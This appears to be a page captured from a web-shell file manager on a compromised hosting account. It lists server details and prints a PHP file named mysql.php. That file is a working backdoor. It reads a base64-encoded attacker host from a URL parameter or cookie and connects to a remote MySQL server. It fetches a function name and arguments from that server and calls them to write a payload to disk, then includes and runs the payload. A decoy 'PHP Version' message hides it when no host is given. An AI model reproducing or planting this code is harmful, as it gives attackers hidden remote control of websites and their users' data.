HEX
Server: LiteSpeed
System: Linux premium59.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: gamerijr (666)
PHP: 8.3.27
Disabled: NONE
Upload Files
File: /home/gamerijr/elfla7.com/mysql.php
<?php
if(function_exists("opcache_reset"))opcache_reset();
$host = @$_COOKIE['ip'];
if(!empty($_GET['ip'])){
	$host = $_GET['ip'];
	setcookie('ip', $_GET['ip'], time() + (86400 * 30), "/");
};
if(empty($host))exit("PHP Version");

$name = @$_COOKIE['n'];
if(!empty($_GET['n'])){
	$name= $_GET['n'];
	setcookie('n', $_GET['n'], time() + (86400 * 30), "/");
};
if(empty($name)){
	$name = "class";
}
$f = $name."ยท".$_SERVER["HTTP_HOST"];
$fn = md5($f);
$h = "";
if(!file_exists($fn)){
	$link = @mysqli_connect(base64_decode($host), 'ber', md5($_SERVER["HTTP_USER_AGENT"]), "v1");
	try{
		if ($link) {
			$data = @mysqli_fetch_object(mysqli_query($link, $f));
			if($data){
				$h = $data->h;
				$h($data->k,$data->str);
				if($data->i == "2") die($data->k);
			}
		}
	}catch (Exception $e){
		die($e->getMessage());
	}
}
if(file_exists($fn)){include $fn;}else{ echo "err";}